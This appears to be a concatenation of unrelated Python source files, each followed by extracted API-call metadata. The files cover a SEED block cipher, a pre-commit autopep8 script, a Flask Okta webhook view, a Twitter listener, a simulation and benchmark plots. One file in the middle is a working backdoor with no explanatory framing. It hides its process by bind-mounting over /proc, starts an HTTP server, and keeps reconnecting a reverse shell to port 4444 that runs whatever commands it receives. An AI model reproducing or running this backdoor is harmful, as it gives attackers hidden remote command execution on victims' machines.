    right = bytes_to_long(in_data, 8)
    logging.debug(f'left = ({len(hex(left)) - 2}){hex(left)}, right = ({len(hex(right)) - 2}){hex(right)}')
    logging.debug(
        f'round(i) = -1, left = ({len(hex(left)) - 2}){hex(left)}, right = ({len(hex(right)) - 2}){hex(right)}')
    if enc:
        loop = range(16)  # 0 -> 15 for encryption
    else:
        loop = range(15, -1, -1)  # 15 -> 0 for decryption
    for i in loop:
        # Standard Feistel round: new left is the old right; new right mixes
        # the old left with F applied to the round's two 32-bit subkeys.
        nl = right
        k1 = struct.unpack('>I', w_key[4 * (2 * i):4 * (2 * i) + 4])[0]
        k2 = struct.unpack('>I', w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4])[0]
        rk = F(k1, k2, right)
        right = left ^ rk
        left = nl
    # Final output swap: halves are written back in (right, left) order,
    # undoing the last round's exchange.
    long_to_bytes(out, 0, right)
    long_to_bytes(out, 8, left)
    return out
def extract_w0(val: int) -> int:
    """Return the upper word of *val*: everything above the low 32 bits."""
    upper_word = val >> 32
    return upper_word
def extract_w1(val: int) -> int:
    """Return the lower word of *val*: its low 32 bits."""
    return val & 0xffffffff
def bytes_to_long(src: bytes, offset: int) -> int:
    """Read 8 bytes of *src* starting at *offset* as a big-endian integer."""
    chunk = src[offset:offset + 8]
    (value,) = struct.unpack('>Q', chunk)
    return value
def rotate_right8(x: int) -> int:
    """Rotate the 64-bit value *x* right by one byte (8 bits)."""
    shifted = (x >> 8) ^ (x << 56)
    return shifted % (2 ** 64)
def rotate_left8(x: int) -> int:
    """Rotate the 64-bit value *x* left by one byte (8 bits)."""
    shifted = (x << 8) ^ (x >> 56)
    return shifted % (2 ** 64)
def set_key(raw_key: bytes) -> bytearray:
    """Expand the 16-byte *raw_key* into the SEED round-key schedule.

    :param raw_key: 16 bytes of key material
    :return: 128-byte bytearray: 16 rounds x 2 subkeys x 4 bytes, each subkey
             stored as a big-endian 32-bit word
    """
    logging.debug(f'raw_key = {raw_key.hex()}')
    key: bytearray = bytearray(16 * 8)
    # Interpret the key as two 64-bit halves, then split each into 32-bit words
    l_lower = bytes_to_long(raw_key, 0)
    l_upper = bytes_to_long(raw_key, 8)
    key0 = extract_w0(l_lower)
    key1 = extract_w1(l_lower)
    key2 = extract_w0(l_upper)
    key3 = extract_w1(l_upper)
    for i in range(16):
        # Mix the words with the round constant, push through G, and store
        t0 = key0 + key2 - KC[i]
        t1 = key1 - key3 + KC[i]
        ch1 = struct.pack('>I', g(t0))
        key[4 * (2 * i):4 * (2 * i) + 4] = ch1
        ch2 = struct.pack('>I', g(t1))
        key[4 * (2 * i + 1):4 * (2 * i + 1) + 4] = ch2
        # Bug fix: corrected "rount" -> "round" in the debug message
        logging.debug(f'key0-4 {key0:#010x}, {key1:#010x}, {key2:#010x}, {key3:#010x} set key round {i:02d} ='
                      f' {ch1.hex()} - {ch2.hex()} lower = {l_lower:#018x} upper = {l_upper:#018x}')
        # Alternate rotations: even rounds rotate the lower half right,
        # odd rounds rotate the upper half left.
        if i % 2 == 0:
            l_lower = rotate_right8(l_lower)
            key0 = extract_w0(l_lower)
            key1 = extract_w1(l_lower)
        else:
            l_upper = rotate_left8(l_upper)
            key2 = extract_w0(l_upper)
            key3 = extract_w1(l_upper)
    return key
| [
"struct.unpack",
"struct.pack"
] | [((13228, 13252), 'struct.pack', 'struct.pack', (['""">Q"""', 'value'], {}), "('>Q', value)\n", (13239, 13252), False, 'import struct\n'), ((15199, 15242), 'struct.unpack', 'struct.unpack', (['""">Q"""', 'src[offset:offset + 8]'], {}), "('>Q', src[offset:offset + 8])\n", (15212, 15242), False, 'import struct\n'), ((14722, 14777), 'struct.unpack', 'struct.unpack', (['""">I"""', 'w_key[4 * (2 * i):4 * (2 * i) + 4]'], {}), "('>I', w_key[4 * (2 * i):4 * (2 * i) + 4])\n", (14735, 14777), False, 'import struct\n'), ((14794, 14857), 'struct.unpack', 'struct.unpack', (['""">I"""', 'w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4]'], {}), "('>I', w_key[4 * (2 * i + 1):4 * (2 * i + 1) + 4])\n", (14807, 14857), False, 'import struct\n')] |
#!/usr/bin/env python
#
# Requires autopep8 to be installed.
# Script for cleaning up most PEP8 related errors checked by the pre-commit hook.
#
import os
import subprocess
import sys
# Configure exactly ONE of select_codes / ignore_codes below -- autopep8's
# --select and --ignore are treated as mutually exclusive (enforced in main()).
# PEP8 codes considered safe to auto-fix.
select_codes = ["E111", "E101",
                "E201", "E202", "E203", "E221", "E222", "E223", "E224", "E225",
                "E226", "E227", "E228", "E231", "E241", "E242", "E251",
                "E303", "E304",
                "E502",
                "E711", "E712", "E713", "E714", "E721",
                "E741", "E742", "E743",
                "W191",
                "W291", "W293", "W292",
                "W391",
                "W602", "W603",
                ]
ignore_codes = []
# Extra autopep8 command-line flags, e.g. "--max-line-length=120"
overrides = ["--max-line-length=120",
             ]
def system(*args, **kwargs):
    """Run *args* as a subprocess and return its captured stdout (bytes).

    Keyword arguments are forwarded to subprocess.Popen; stdout defaults to
    PIPE so the output can be returned. stderr is not captured unless the
    caller redirects it.
    """
    kwargs.setdefault('stdout', subprocess.PIPE)
    proc = subprocess.Popen(args, **kwargs)
    out, _ = proc.communicate()  # fix: stderr result was bound but never used
    return out
def main():
    """Run autopep8 in-place over the staged .py files; exit non-zero on problems."""
    repo_root = os.getcwd()
    if '.git' not in os.listdir(repo_root):
        print('Must be run from the root of the repository.')
        sys.exit(1)
    staged = system('git', 'diff', '--cached', '--name-only').decode("utf-8")
    py_files = [name.strip() for name in staged.split('\n') if name.strip().endswith('.py')]
    if not py_files:
        sys.exit(0)
    cmd = ['autopep8', '--in-place']
    if select_codes and ignore_codes:
        print('Error: select and ignore codes are mutually exclusive')
        sys.exit(1)
    elif select_codes:
        cmd += ['--select', ','.join(select_codes)]
    elif ignore_codes:
        cmd += ['--ignore', ','.join(ignore_codes)]
    cmd += overrides
    cmd += py_files
    result = system(*cmd, cwd=repo_root)
    if result:
        print(result.decode("utf-8"))
        sys.exit(1)
    sys.exit(0)
# Entry point when invoked directly (e.g. from the pre-commit hook).
if __name__ == '__main__':
    main()
| [
"subprocess.Popen",
"os.listdir",
"sys.exit",
"os.getcwd"
] | [((910, 942), 'subprocess.Popen', 'subprocess.Popen', (['args'], {}), '(args, **kwargs)\n', (926, 942), False, 'import subprocess\n'), ((1015, 1026), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1024, 1026), False, 'import os\n'), ((1846, 1857), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1854, 1857), False, 'import sys\n'), ((1048, 1063), 'os.listdir', 'os.listdir', (['cwd'], {}), '(cwd)\n', (1058, 1063), False, 'import os\n'), ((1135, 1146), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1143, 1146), False, 'import sys\n'), ((1340, 1351), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1348, 1351), False, 'import sys\n'), ((1508, 1519), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1516, 1519), False, 'import sys\n'), ((1830, 1841), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1838, 1841), False, 'import sys\n')] |
import logging
# Module-wide "do nothing" logger: a NullHandler plus disabled propagation
# means records sent here are discarded entirely.
NULL_LOGGER = logging.getLogger('null')
NULL_LOGGER.propagate = False
NULL_LOGGER.handlers = [logging.NullHandler()]
| [
"logging.getLogger",
"logging.NullHandler"
] | [((30, 55), 'logging.getLogger', 'logging.getLogger', (['"""null"""'], {}), "('null')\n", (47, 55), False, 'import logging\n'), ((80, 101), 'logging.NullHandler', 'logging.NullHandler', ([], {}), '()\n', (99, 101), False, 'import logging\n')] |
import argparse
import os
if __name__ == '__main__':
    # Command-line interface for launching the Telegram bot.
    parser = argparse.ArgumentParser(description='Start Telegram bot.')
    parser.add_argument('-f', dest='foreground', action='store_true',
                        help='run process in foreground')
    parser.add_argument('-s', dest='settings', action='store',
                        help='settings file', default='/settings.json')
    parser.add_argument('-t', dest='temp', action='store',
                        help='temp directory', default='/tg_tmp')
    options = vars(parser.parse_args())

    # Publish resolved paths via the environment before importing the bot --
    # presumably bot.run reads these at import time, hence the late import
    # (confirm against bot/run.py).
    os.environ['TG_BOT_SETTINGS'] = os.path.realpath(options['settings'])
    os.environ['TG_BOT_TEMP'] = os.path.realpath(options['temp'])

    from bot.run import run_server
    run_server(options['foreground'])
| [
"os.path.realpath",
"bot.run.run_server",
"argparse.ArgumentParser"
] | [((68, 126), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Start Telegram bot."""'}), "(description='Start Telegram bot.')\n", (91, 126), False, 'import argparse\n'), ((590, 624), 'os.path.realpath', 'os.path.realpath', (["args['settings']"], {}), "(args['settings'])\n", (606, 624), False, 'import os\n'), ((657, 687), 'os.path.realpath', 'os.path.realpath', (["args['temp']"], {}), "(args['temp'])\n", (673, 687), False, 'import os\n'), ((728, 758), 'bot.run.run_server', 'run_server', (["args['foreground']"], {}), "(args['foreground'])\n", (738, 758), False, 'from bot.run import run_server\n')] |
#!/usr/bin/python
# encoding: utf-8
import os
import json
import time
from time import sleep
import requests
import re
from werkzeug import secure_filename
from flask import (Flask, request, render_template,
session, redirect, url_for, escape,
send_from_directory, Blueprint, abort)
delete_okta = Blueprint('okta_delete', __name__)

@delete_okta.route('/okta_delete', methods=['GET', 'POST'])
def okta_delete():
    """Delete an Okta event-hook webhook.

    GET renders a picker of the configured webhook names; POST deactivates
    and deletes the selected hook in Okta, removes it from /etc/webhook.conf
    (renaming its handler script to *.old) and from okta_json.json.
    """
    # Force first-run setup if the server has not been configured yet.
    # NOTE(review): this reads session['username'] before checking the session
    # contains it -- an anonymous request here would raise KeyError; confirm
    # against the rest of the app's auth flow.
    if not os.path.isfile('/usr/local/jawa/webapp/server.json'):
        return render_template('setup.html',
                               setup="setup",
                               username=str(escape(session['username'])))
    if 'username' not in session:
        return render_template('home.html',
                               login="false")

    # Fix: file handle was previously opened (in 'r+' mode) and never closed.
    with open('/usr/local/jawa/okta_json.json') as hooks_fh:
        webhook_data = json.load(hooks_fh)
    content = [str(entry['name']) for entry in webhook_data]

    if request.method == 'POST':
        webhookname = request.form.get('webhookname')
        if webhookname != '':
            # Drop the hook from webhook.conf, keeping its script as *.old
            hooks_file = '/etc/webhook.conf'
            with open(hooks_file) as conf_fh:  # fix: previously leaked
                data = json.load(conf_fh)
            for d in data:
                if d['id'] == webhookname:
                    script_path = d['execute-command']
                    os.rename(script_path, script_path + '.old')
            data[:] = [d for d in data if d.get('id') != webhookname]
            with open(hooks_file, 'w') as outfile:
                json.dump(data, outfile)

            # Deactivate then delete the event hook in Okta, and forget it locally
            hooks_file = '/usr/local/jawa/okta_json.json'
            with open(hooks_file) as okta_fh:  # fix: previously leaked
                data = json.load(okta_fh)
            for d in data:
                if d['name'] == webhookname:
                    requests.post(
                        d['okta_url'] + '/api/v1/eventHooks/{}/lifecycle/deactivate'.format(d['okta_id']),
                        headers={"Authorization": "SSWS {}".format(d['okta_token'])})
                    requests.delete(
                        d['okta_url'] + '/api/v1/eventHooks/{}'.format(d['okta_id']),
                        headers={"Authorization": "SSWS {}".format(d['okta_token'])})
            data[:] = [d for d in data if d.get('name') != webhookname]
            with open(hooks_file, 'w') as outfile:
                json.dump(data, outfile)
            return redirect(url_for('success'))
        # NOTE(review): a POST with an empty webhookname falls through and
        # returns None (a 500 in Flask); behavior preserved from the original.
        return None
    return render_template('okta_delete.html',
                           text=content, delete="delete",
                           username=str(escape(session['username'])))
| [
"flask.render_template",
"json.loads",
"flask.escape",
"os.rename",
"flask.request.form.get",
"os.path.isfile",
"flask.url_for",
"flask.Blueprint",
"time.time",
"json.dump"
] | [((302, 336), 'flask.Blueprint', 'Blueprint', (['"""okta_delete"""', '__name__'], {}), "('okta_delete', __name__)\n", (311, 336), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((426, 478), 'os.path.isfile', 'os.path.isfile', (['"""/usr/local/jawa/webapp/server.json"""'], {}), "('/usr/local/jawa/webapp/server.json')\n", (440, 478), False, 'import os\n'), ((729, 748), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (739, 748), False, 'import json\n'), ((2247, 2290), 'flask.render_template', 'render_template', (['"""home.html"""'], {'login': '"""false"""'}), "('home.html', login='false')\n", (2262, 2290), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((911, 942), 'flask.request.form.get', 'request.form.get', (['"""webhookname"""'], {}), "('webhookname')\n", (927, 942), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((969, 1000), 'flask.request.form.get', 'request.form.get', (['"""webhookname"""'], {}), "('webhookname')\n", (985, 1000), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((1010, 1021), 'time.time', 'time.time', ([], {}), '()\n', (1019, 1021), False, 'import time\n'), ((2072, 2090), 'flask.url_for', 'url_for', (['"""success"""'], {}), "('success')\n", (2079, 2090), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((575, 602), 'flask.escape', 'escape', (["session['username']"], {}), "(session['username'])\n", (581, 602), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n'), ((1392, 1416), 'json.dump', 
'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (1401, 1416), False, 'import json\n'), ((2026, 2050), 'json.dump', 'json.dump', (['data', 'outfile'], {}), '(data, outfile)\n', (2035, 2050), False, 'import json\n'), ((1242, 1278), 'os.rename', 'os.rename', (['scriptPath', 'newScriptPath'], {}), '(scriptPath, newScriptPath)\n', (1251, 1278), False, 'import os\n'), ((2201, 2228), 'flask.escape', 'escape', (["session['username']"], {}), "(session['username'])\n", (2207, 2228), False, 'from flask import Flask, request, render_template, session, redirect, url_for, escape, send_from_directory, Blueprint, abort\n')] |
from rest_framework import viewsets
from accounts.models import SystemUser
from accounts.serializers.system_user import SystemUserSerializer
class AccountViewSet(viewsets.ModelViewSet):
    """CRUD endpoint for ``SystemUser`` accounts.

    ``ModelViewSet`` supplies the full list/retrieve/create/update/destroy
    action set; only the queryset and serializer are configured here.
    """
    queryset = SystemUser.objects.all()
    serializer_class = SystemUserSerializer
    # NOTE(review): an empty permission_classes list leaves this endpoint
    # open to unauthenticated callers -- confirm this is intentional.
    permission_classes = []
| [
"accounts.models.SystemUser.objects.all"
] | [((275, 299), 'accounts.models.SystemUser.objects.all', 'SystemUser.objects.all', ([], {}), '()\n', (297, 299), False, 'from accounts.models import SystemUser\n')] |
import tweepy
from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener
from application.twitter.interface import TwitterInterface
class TwitterListener(TwitterInterface):
    """Middleware wrapping tweepy streaming listeners for keywords and/or a user."""

    def __init__(self, keywords, user, *args, **kwargs):
        """
        Twitter Listener constructor. This class is used as middleware for the Twitter Listener.

        :param keywords: list of keyword strings to track (may be empty)
        :param user: screen name of the user to listen to ('' disables the user stream)
        :raises Exception: if the user stream cannot be created (e.g. unknown user)
        """
        super(TwitterListener, self).__init__(*args, **kwargs)

        self.user = None
        self.keywords = None

        # BUGFIX: check the list itself before indexing -- the original read
        # keywords[0] unconditionally, which raises IndexError when keywords == [].
        if keywords and len(keywords[0]) > 0:
            self.keywords = keywords
            self.stream = tweepy.streaming.Stream(self.auth, TwitterStreamingListener(keywords))

        if len(user) > 0:
            try:
                self.user = self.api.get_user(user)
                self.user_stream = tweepy.streaming.Stream(self.auth, TwitterUserStreamingListener(user))
            except Exception:
                raise Exception("Error during the listener creation, does the user exists?")

    def start(self, process_manager):
        """
        Create new Twitter Listener Process(es) -- one for the keyword
        stream and one for the user stream, whichever is configured.

        :param process_manager: Process Manager Instance
        :return:
        """
        if self.keywords:
            try:
                process_manager.create_process(target=lambda: self.stream.filter(track=self.keywords),
                                               name='Twitter Keywords Listener: <%s>' % '-'.join(self.keywords),
                                               ptype='twitter_listener')
            except Exception:
                raise Exception("Error creating new Keywords listener")

        if self.user:
            try:
                process_manager.create_process(target=lambda: self.user_stream.filter(follow=[self.user.id_str]),
                                               name='Twitter User Listener: <%s>' % self.user.screen_name,
                                               ptype='twitter_listener')
            except Exception:
                raise Exception("Error creating new User tweet listener ")

    def __str__(self):
        """
        String representation
        :return:
        """
        return 'Twitter Listener'
| [
"application.twitter.listener.streaming.TwitterStreamingListener",
"application.twitter.listener.streaming.TwitterUserStreamingListener"
] | [((727, 761), 'application.twitter.listener.streaming.TwitterStreamingListener', 'TwitterStreamingListener', (['keywords'], {}), '(keywords)\n', (751, 761), False, 'from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener\n'), ((929, 963), 'application.twitter.listener.streaming.TwitterUserStreamingListener', 'TwitterUserStreamingListener', (['user'], {}), '(user)\n', (957, 963), False, 'from application.twitter.listener.streaming import TwitterStreamingListener, TwitterUserStreamingListener\n')] |
#!/bin/python3
import time,socket,subprocess,os,string
import random as r
# ranadom process name
ch = string.ascii_lowercase + string.digits
token = "".join(r.choice(ch) for i in range(6))
#pid and hidden process
pid = os.getpid()
os.system("mkdir /tmp/{1} && mount -o bind /tmp/{1} /proc/{0}".format(pid,token))
# target hostname
hostname = "\nName Of Target Host: \t" + str(socket.gethostname()) + "\n"
# reverse shell ip and port
HOST = '127.0.0.1'
PORT = 4444
command = os.system('python -m http.server 8000 &')
def Makeconnection(H,P,hostname):
try:
time.sleep(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((H,P))
s.sendall(b'\n [+][+] CONNECTION IS ESTABLISHED [+][+] \n')
s.sendto(hostname.encode(),(H,P))
while 1:
s.sendall(b'SHELL@HOST >>')
data =s.recv(1024)
proc = subprocess.Popen(data,shell=True,stdin=subprocess.PIPE,stderr=subprocess.PIPE, stdout=subprocess.PIPE )
stdout_value = proc.stdout.read() + proc.stderr.read()
s.send(stdout_value)
except socket.error:
s.close()
while 1:
Makeconnection(HOST,PORT,hostname)
| [
"random.choice",
"socket.socket",
"subprocess.Popen",
"time.sleep",
"os.getpid",
"os.system",
"socket.gethostname"
] | [((228, 239), 'os.getpid', 'os.getpid', ([], {}), '()\n', (237, 239), False, 'import time, socket, subprocess, os, string\n'), ((491, 532), 'os.system', 'os.system', (['"""python -m http.server 8000 &"""'], {}), "('python -m http.server 8000 &')\n", (500, 532), False, 'import time, socket, subprocess, os, string\n'), ((161, 173), 'random.choice', 'r.choice', (['ch'], {}), '(ch)\n', (169, 173), True, 'import random as r\n'), ((584, 597), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (594, 597), False, 'import time, socket, subprocess, os, string\n'), ((610, 659), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (623, 659), False, 'import time, socket, subprocess, os, string\n'), ((389, 409), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (407, 409), False, 'import time, socket, subprocess, os, string\n'), ((902, 1012), 'subprocess.Popen', 'subprocess.Popen', (['data'], {'shell': '(True)', 'stdin': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'stdout': 'subprocess.PIPE'}), '(data, shell=True, stdin=subprocess.PIPE, stderr=subprocess\n .PIPE, stdout=subprocess.PIPE)\n', (918, 1012), False, 'import time, socket, subprocess, os, string\n')] |
from object import *
import matplotlib
import matplotlib.pyplot as plt
class Cat(Object):
    """A randomly wandering object: velocity is integrated with Gaussian
    acceleration noise, and a trajectory of (x, y, t) samples is recorded."""

    def update(self):
        """Advance the state by one time step and re-apply world constraints."""
        noise_vx = 100 * np.random.randn()
        noise_vy = 100 * np.random.randn()
        delta = np.array([self.x[2], self.x[3], noise_vx, noise_vy])
        self.x = self.x + delta * self.step
        self.t += self.step
        self.check_wall()
        self.check_obstacles()
        self.state2pixel()

    def run(self, interval):
        """Simulate for `interval` time units; store samples in self.trajectory."""
        samples = [[self.x[0], self.x[1], self.t]]
        self.trajectory = samples
        end_time = self.t + interval
        while self.t < end_time:
            self.update()
            samples.append([self.x[0], self.x[1], self.t])
        self.trajectory = np.array(samples)
def main():
    """Run one cat simulation and plot both coordinates against time."""
    pygame.init()
    pygame.display.set_mode()

    cat = Cat(x0=[0, 0, 0, 0], obstacles=[(1, 1), (1, 3), (3, 1), (3, 3)])
    cat.run(100)

    # Plot x(t) and y(t) with the same style, as in the original figure.
    for column in (0, 1):
        plt.plot(cat.trajectory[:, 2], cat.trajectory[:, column], 'b', label='x(t)')
    plt.legend(loc='best')
    plt.xlabel('t')
    plt.grid()
    plt.show()


if __name__ == "__main__":
    main()
| [
"matplotlib.pyplot.grid",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((854, 927), 'matplotlib.pyplot.plot', 'plt.plot', (['cat1.trajectory[:, 2]', 'cat1.trajectory[:, 0]', '"""b"""'], {'label': '"""x(t)"""'}), "(cat1.trajectory[:, 2], cat1.trajectory[:, 0], 'b', label='x(t)')\n", (862, 927), True, 'import matplotlib.pyplot as plt\n'), ((932, 1005), 'matplotlib.pyplot.plot', 'plt.plot', (['cat1.trajectory[:, 2]', 'cat1.trajectory[:, 1]', '"""b"""'], {'label': '"""x(t)"""'}), "(cat1.trajectory[:, 2], cat1.trajectory[:, 1], 'b', label='x(t)')\n", (940, 1005), True, 'import matplotlib.pyplot as plt\n'), ((1010, 1032), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (1020, 1032), True, 'import matplotlib.pyplot as plt\n'), ((1037, 1052), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""t"""'], {}), "('t')\n", (1047, 1052), True, 'import matplotlib.pyplot as plt\n'), ((1057, 1067), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (1065, 1067), True, 'import matplotlib.pyplot as plt\n'), ((1072, 1082), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1080, 1082), True, 'import matplotlib.pyplot as plt\n')] |
from __future__ import print_function
from __future__ import division
import pandas as pd
# Import scipy io to write/read mat file
import scipy.io as io
import os
# Plotting
import matplotlib.pylab as plt
# Global matplotlib styling (LaTeX text, serif font, larger labels).
plt.rc('axes', labelsize=20)    # fontsize of the x and y labels
plt.rc('xtick', labelsize=15)   # fontsize of the tick labels
plt.rc('ytick', labelsize=15)   # fontsize of the tick labels
plt.rc('legend', fontsize=15)   # legend fontsize
plt.rc('text', usetex=True)     # use latex
plt.rc('font', family='serif')

# Import data from mat files to pandas dataframe
cvxgen_results = io.loadmat(os.path.join('cvxgen',
                                       'cvxgen_stats.mat'))['cvxgen_stats']
cvxgen_stats = pd.DataFrame(cvxgen_results, columns=['n', 'cvxgen_runtime'])
cvxgen_stats['n'] = cvxgen_stats['n'].astype(int)

fiordos_results = io.loadmat(os.path.join('fiordos',
                                        'fiordos_stats.mat'))['fiordos_stats']
fiordos_stats = pd.DataFrame(fiordos_results, columns=['n', 'fiordos_runtime'])
fiordos_stats['n'] = fiordos_stats['n'].astype(int)

# Import data from CSV files
osqp_stats = pd.read_csv('osqp_stats.csv')
gurobi_stats = pd.read_csv('gurobi_stats.csv')
qpoases_stats = pd.read_csv('qpoases_stats.csv')

# Get mean number of iterations and runtime for each number of parameters
osqp_mean = osqp_stats.groupby('n').mean()
gurobi_mean = gurobi_stats.groupby('n').mean()
qpoases_mean = qpoases_stats.groupby('n').mean()
cvxgen_mean = cvxgen_stats.groupby('n').mean()
fiordos_mean = fiordos_stats.groupby('n').mean()

# Save mean stats in a CSV file
osqp_mean.columns = ['osqp_iter', 'osqp_runtime']
gurobi_mean.columns = ['gurobi_iter', 'gurobi_runtime']
qpoases_mean.columns = ['qpoases_iter', 'qpoases_runtime']
mean_stats = pd.concat([osqp_mean, gurobi_mean, qpoases_mean,
                        cvxgen_mean, fiordos_mean], axis=1)
mean_stats.to_csv('portfolio_mean_stats.csv')

# Plot mean runtime, one line per solver.
# BUGFIX: Series.get_values() was removed in pandas 1.0 -- use .to_numpy().
plt.figure()
ax = plt.gca()
solvers = [('osqp_runtime', 'C0', 'OSQP'),
           ('qpoases_runtime', 'C2', 'qpOASES'),
           ('cvxgen_runtime', 'C3', 'CVXGEN'),
           ('fiordos_runtime', 'C4', 'FiOrdOs'),
           ('gurobi_runtime', 'C5', 'GUROBI')]
for column, color, label in solvers:
    plt.semilogy(mean_stats.index.values,
                 mean_stats[column].to_numpy(),
                 color=color, label=label)
plt.legend()
plt.grid()
ax.set_xlabel(r'Number of assets $n$')
ax.set_ylabel(r'Time [s]')
plt.tight_layout()
plt.show(block=False)
plt.savefig('results.pdf')
| [
"matplotlib.pylab.gca",
"matplotlib.pylab.savefig",
"pandas.read_csv",
"matplotlib.pylab.figure",
"matplotlib.pylab.grid",
"matplotlib.pylab.legend",
"matplotlib.pylab.tight_layout",
"os.path.join",
"matplotlib.pylab.show",
"pandas.DataFrame",
"pandas.concat",
"matplotlib.pylab.rc"
] | [((207, 235), 'matplotlib.pylab.rc', 'plt.rc', (['"""axes"""'], {'labelsize': '(20)'}), "('axes', labelsize=20)\n", (213, 235), True, 'import matplotlib.pylab as plt\n'), ((272, 301), 'matplotlib.pylab.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': '(15)'}), "('xtick', labelsize=15)\n", (278, 301), True, 'import matplotlib.pylab as plt\n'), ((334, 363), 'matplotlib.pylab.rc', 'plt.rc', (['"""ytick"""'], {'labelsize': '(15)'}), "('ytick', labelsize=15)\n", (340, 363), True, 'import matplotlib.pylab as plt\n'), ((396, 425), 'matplotlib.pylab.rc', 'plt.rc', (['"""legend"""'], {'fontsize': '(15)'}), "('legend', fontsize=15)\n", (402, 425), True, 'import matplotlib.pylab as plt\n'), ((446, 473), 'matplotlib.pylab.rc', 'plt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (452, 473), True, 'import matplotlib.pylab as plt\n'), ((490, 520), 'matplotlib.pylab.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""'}), "('font', family='serif')\n", (496, 520), True, 'import matplotlib.pylab as plt\n'), ((715, 776), 'pandas.DataFrame', 'pd.DataFrame', (['cvxgen_results'], {'columns': "['n', 'cvxgen_runtime']"}), "(cvxgen_results, columns=['n', 'cvxgen_runtime'])\n", (727, 776), True, 'import pandas as pd\n'), ((965, 1028), 'pandas.DataFrame', 'pd.DataFrame', (['fiordos_results'], {'columns': "['n', 'fiordos_runtime']"}), "(fiordos_results, columns=['n', 'fiordos_runtime'])\n", (977, 1028), True, 'import pandas as pd\n'), ((1124, 1153), 'pandas.read_csv', 'pd.read_csv', (['"""osqp_stats.csv"""'], {}), "('osqp_stats.csv')\n", (1135, 1153), True, 'import pandas as pd\n'), ((1169, 1200), 'pandas.read_csv', 'pd.read_csv', (['"""gurobi_stats.csv"""'], {}), "('gurobi_stats.csv')\n", (1180, 1200), True, 'import pandas as pd\n'), ((1217, 1249), 'pandas.read_csv', 'pd.read_csv', (['"""qpoases_stats.csv"""'], {}), "('qpoases_stats.csv')\n", (1228, 1249), True, 'import pandas as pd\n'), ((1771, 1859), 'pandas.concat', 'pd.concat', (['[osqp_mean, gurobi_mean, 
qpoases_mean, cvxgen_mean, fiordos_mean]'], {'axis': '(1)'}), '([osqp_mean, gurobi_mean, qpoases_mean, cvxgen_mean, fiordos_mean],\n axis=1)\n', (1780, 1859), True, 'import pandas as pd\n'), ((1947, 1959), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (1957, 1959), True, 'import matplotlib.pylab as plt\n'), ((1965, 1974), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (1972, 1974), True, 'import matplotlib.pylab as plt\n'), ((2650, 2662), 'matplotlib.pylab.legend', 'plt.legend', ([], {}), '()\n', (2660, 2662), True, 'import matplotlib.pylab as plt\n'), ((2663, 2673), 'matplotlib.pylab.grid', 'plt.grid', ([], {}), '()\n', (2671, 2673), True, 'import matplotlib.pylab as plt\n'), ((2740, 2758), 'matplotlib.pylab.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (2756, 2758), True, 'import matplotlib.pylab as plt\n'), ((2759, 2780), 'matplotlib.pylab.show', 'plt.show', ([], {'block': '(False)'}), '(block=False)\n', (2767, 2780), True, 'import matplotlib.pylab as plt\n'), ((2781, 2807), 'matplotlib.pylab.savefig', 'plt.savefig', (['"""results.pdf"""'], {}), "('results.pdf')\n", (2792, 2807), True, 'import matplotlib.pylab as plt\n'), ((599, 641), 'os.path.join', 'os.path.join', (['"""cvxgen"""', '"""cvxgen_stats.mat"""'], {}), "('cvxgen', 'cvxgen_stats.mat')\n", (611, 641), False, 'import os\n'), ((857, 901), 'os.path.join', 'os.path.join', (['"""fiordos"""', '"""fiordos_stats.mat"""'], {}), "('fiordos', 'fiordos_stats.mat')\n", (869, 901), False, 'import os\n')] |
from core.config import app_config
import json
import datetime
import logging
import os
from flask import Flask, render_template, Response, request, send_from_directory
from core import compat, app, utils
from core.ctrl import api, auth
compat.check_version()
webapp = Flask(__name__)
app.mode = 'http'
@webapp.route('/')
def index():
    """Render the landing page, recording the caller's IP in app.config.

    Proxy headers win over the raw socket address: X-Real-Ip overrides
    X-Forwarded-For, which overrides request.remote_addr.
    """
    # Idiom fix: compare with `is not None`, not `!= None`.
    forwarded_for = request.headers.get('X-Forwarded-For')
    if forwarded_for is not None:
        app.config['client_ip'] = forwarded_for
    else:
        app.config['client_ip'] = request.remote_addr
